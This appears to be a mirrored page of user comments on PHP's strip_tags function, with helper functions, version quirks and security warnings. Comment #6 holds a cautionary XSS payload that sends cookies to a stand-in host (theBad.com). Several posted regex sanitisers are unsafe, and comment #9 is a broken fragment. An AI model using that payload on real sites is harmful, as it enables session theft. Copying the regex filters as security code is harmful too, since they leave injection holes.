©
本文档使用
php.cn手册 发布
[#1] denis dot for dot spam at gmail dot com [2015-11-10 13:36:43]
my function to remove specific tags with the content and can remove elements with attributes
<?php
function strip_selected_tags_content( $text, $tags = array() ) {
foreach ( $tags as $key => $val ) {
if ( ! is_array( $val ) ) {
$text = preg_replace( '/<' . $val . '[^>]*>([\s\S]*?)<\/' . $val . '[^>]*>/', '', $text );
} else {
$text = preg_replace( '/<' . $val[0] . ' ' . $val[1] . '[^>]*>([\s\S]*?)<\/' . $val[0] . '[^>]*>/', '', $text );
}
}
return $text;
}
?>
example:
<?php
$clear = array('social',
'script',
'noindex',
'time',
'header',
array( 'div', 'class="tags"' ),
array( 'div', 'class="box_comments"' ),
array( 'p', 'class="form-submit"' ),
array( 'div', 'class="comment-form-comment"' )
)
text = '<preheader>image article</preheader>
<header>nnnnn</header>
<social>fb code, google code etc...</social>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
<div class="tags">true code, that code</div>
<div calss="comment-form-comment"> coment form on blog</div>
';
echo strip_selected_tags_content($text, $clear);
?>
output:
<?php
<preheader>image article</preheader>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
?>
[#2] Dr. Gianluigi "Zane" Zanettini [2015-10-22 07:52:37]
A word of caution. strip_tags() can actually be used for input validation as long as you remove ANY tag. As soon as you accept a single tag (2nd parameter), you are opening up a security hole such as this:
<acceptedTag onLoad="javascript:malicious()" />
Plus: regexing away attributes or code block is really not the right solution. For effective input validation when using strip_tags() with even a single tag accepted, http://htmlpurifier.org/ is the way to go.
[#3] doug at exploittheweb dot com [2015-08-11 10:17:29]
"5.3.4 strip_tags() no longer strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags."
This is poorly worded.
The above seems to be saying that, since 5.3.4, if you don't specify "<br/>" in allowable_tags then "<br/>" will not be stripped... but that's not actually what they're trying to say.
What it means is, in versions prior to 5.3.4, it "strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags", and that since 5.3.4 this is no longer the case.
So what reads as "no longer strips self-closing tags (unless the self-closing XHTML tag is also given in allowable_tags)" is actually saying "no longer (strips self-closing tags unless the self-closing XHTML tag is also given in allowable_tags)".
i.e.
pre-5.3.4: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br>' // strips <br/> because it wasn't explicitly specified in allowable_tags
5.3.4 and later: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br><br/>' // does not strip <br/> because PHP matches it with <br> in allowable_tags
[#4] valentin dot boschatel at evalandgo dot com [2015-05-26 09:41:57]
Hi,
I havee a problem with this function. I want use this symbol in my text ( < ), but it doesn't work because I added character stuck to that symbol.
Exemple :
<?php
$test = '<p><span style="color: #ff0000; background-color: #000000;">Complex</span> <span style="font-family: impact,chicago;">text <50% </span> <a href="http://exempledomain.com/"><em>with</em></a> <span style="font-size: 36pt;"><strong>tags</strong></span></p>';
echo strip_tags('$test');
// Outputs : Complex text
?>
I made a function for this :
Function:
<?php
function strip_tags_review($str, $allowable_tags = '') {
preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($allowable_tags), $tags);
$tags = array_unique($tags[1]);
if(is_array($tags) AND count($tags) > 0) {
$pattern = '@<(?!(?:' . implode('|', $tags) . ')\b)(\w+)\b.*?>(.*?)</\1>@i';
}
else {
$pattern = '@<(\w+)\b.*?>(.*?)</\1>@i';
}
$str = preg_replace($pattern, '$2', $str);
return preg_match($pattern, $str) ? strip_tags_review($str, $allowable_tags) : $str;
}
echo strip_tags_review($test);
// Outputs: Complex text <50% with tags
echo strip_tags_review($test, '<a>');
// Outputs: Complex text <50% <a href="http://exempledomain.com">with</a> tags
?>
[#5] fernando at zauber dot es [2014-11-10 23:45:33]
As you probably know, the native function strip_tags don't work very well with malformed HTML when you use the allowed tags parameter.
This is a very simple but effective function to remove html tags. It takes a list (array) of allowed tags as second parameter:
<?php
function flame_strip_tags($html, $allowed_tags=array()) {
$allowed_tags=array_map(strtolower,$allowed_tags);
$rhtml=preg_replace_callback('/<\/?([^>\s]+)[^>]*>/i', function ($matches) use (&$allowed_tags) {
return in_array(strtolower($matches[1]),$allowed_tags)?$matches[0]:'';
},$html);
return $rhtml;
}
?>
The function works reasonably well with invalid/bad formatted HTML.
Use:
<?php
$allowed_tags=array("h1","a");
$html=<<<EOD
<h1>Example</h1>
<dt><a href='/manual/en/getting-started.php'>Getting Started</a></dt>
<dd><a href='/manual/en/introduction.php'>Introduction</a></dd>
<dd><a href='/manual/en/tutorial.php'>A simple tutorial</a></dd>
<dt><a href='/manual/en/langref.php'>Language Reference</a></dt>
<dd><a href='/manual/en/language.basic-syntax.php'>Basic syntax</a></dd>
<dd><a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a></dd>
</dl>
EOD;
echo flame_strip_tags($html,$allowed_tags);
?>
The output will be:
<h1>Example</h1>
<a href='/manual/en/getting-started.php'>Getting Started</a>
<a href='/manual/en/introduction.php'>Introduction</a>
<a href='/manual/en/tutorial.php'>A simple tutorial</a>
<a href='/manual/en/langref.php'>Language Reference</a>
<a href='/manual/en/language.basic-syntax.php'>Basic syntax</a>
<a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a>
[#6] bnt dot gloria at outlook dot com [2014-07-10 15:52:56]
With allowable_tags, strip-tags is not safe.
<?php
$str= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str= strip_tags($str, '<p>');
echo $str; // DISPLAY: <p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
?>
[#7] pietro777 [2014-06-06 20:20:45]
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br />||<br/>||<br>');
var_dump($new); // OUTPUTS string(11) "<br>Each<br/>New<br />Line"
[#8] Kenji [2014-04-24 14:11:39]
A word of warning!!
Do NOT use "admin at automapit dot com"s regex. It's broken:
"lalala <b<b>> lala </b<b>>"
will be stripped into
"lalala <b> lala </b>"
I CANNOT overstate the severity of the security issues you are introducing with such a code! Don't use it, stay safe.
[#9] andy [2014-03-06 15:33:38]
<?php
/#s', '', $text, 'm');
}
//introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be
//'<1' becomes '< 1'(note: somewhat application specific)
$text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
$text = strip_tags($text, $allowed_tags);
//eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
$text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);
//strip out inline css and simplify style tags
$search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
$replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
$text = preg_replace($search, $replace, $text);
//on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
//that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
//some MS Style Definitions - this last bit gets rid of any leftover comments */
$num_matches = preg_match_all("/\<!--/u", $text, $matches);
if($num_matches){
$text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
}
return $text;
}
?>
[#16] brettz9 AAT yah [2009-04-05 08:10:58]
Works on shortened
<?php...?>
syntax and thus also will remove XML processing instructions.
[#17] kai at froghh dot de [2009-03-06 08:45:05]
a function that decides if < is a start of a tag or a lower than / lower than + equal:
<?php
function lt_replace($str){
return preg_replace("/<([^[:alpha:]])/", '<\\1', $str);
}
?>
It's to be used before strip_slashes.
[#18] CEO at CarPool2Camp dot org [2009-02-17 11:10:27]
Note the different outputs from different versions of the same tag:
<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br>');
var_dump($new); // OUTPUTS string(21) "<br>EachNew<br />Line"
<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br/>');
var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"
<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br />');
var_dump($new); // OUTPUTS string(11) "EachNewLine"
?>
[#19] mariusz.tarnaski at wp dot pl [2008-11-12 08:05:25]
Hi. I made a function that removes the HTML tags along with their contents:
Function:
<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {
preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
$tags = array_unique($tags[1]);
if(is_array($tags) AND count($tags) > 0) {
if($invert == FALSE) {
return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
}
else {
return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
}
}
elseif($invert == FALSE) {
return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
}
return $text;
}
?>
Sample text:
$text = '<b>sample</b> text with <div>tags</div>';
Result for strip_tags($text):
sample text with tags
Result for strip_tags_content($text):
text with
Result for strip_tags_content($text, '<b>'):
<b>sample</b> text with
Result for strip_tags_content($text, '<b>', TRUE);
text with <div>tags</div>
I hope that someone is useful :)
[#20] admin at automapit dot com [2006-08-09 10:01:54]
<?php
function html2txt($document){
$search = array('@<script[^>]*?>.*?</script>@si', // Strip out javascript
'@<[\/\!]*?[^<>]*?>@si', // Strip out HTML tags
'@<style[^>]*?>.*?</style>@siU', // Strip style tags properly
'@<![\s\S]*?--[ \t\n\r]*>@' // Strip multi-line comments including CDATA
);
$text = preg_replace($search, '', $document);
return $text;
}
?>
This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in it's way.
It's a frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!
[#21] cesar at nixar dot org [2006-03-07 11:44:53]
Here is a recursive function for strip_tags like the one showed in the stripslashes manual page.
<?php
function strip_tags_deep($value)
{
return is_array($value) ?
array_map('strip_tags_deep', $value) :
strip_tags($value);
}
// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);
// Output
print_r($array);
?>
[#22] salavert at~ akelos [2006-02-13 02:21:13]
<?php
function strip_selected_tags($text, $tags = array())
{
$args = func_get_args();
$text = array_shift($args);
$tags = func_num_args() > 2 ? array_diff($args,array($text)) : (array)$tags;
foreach ($tags as $tag){
if(preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)){
$text = str_replace($found[0],$found[1],$text);
}
}
return $text;
}
?>
Hope you find it useful,
Jose Salavert